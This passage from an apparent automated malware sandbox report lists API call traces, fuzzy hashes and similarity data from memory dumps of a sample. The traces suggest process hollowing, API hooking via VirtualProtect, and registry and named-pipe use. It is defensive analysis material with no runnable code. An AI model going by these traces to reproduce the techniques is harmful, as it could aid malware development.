  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
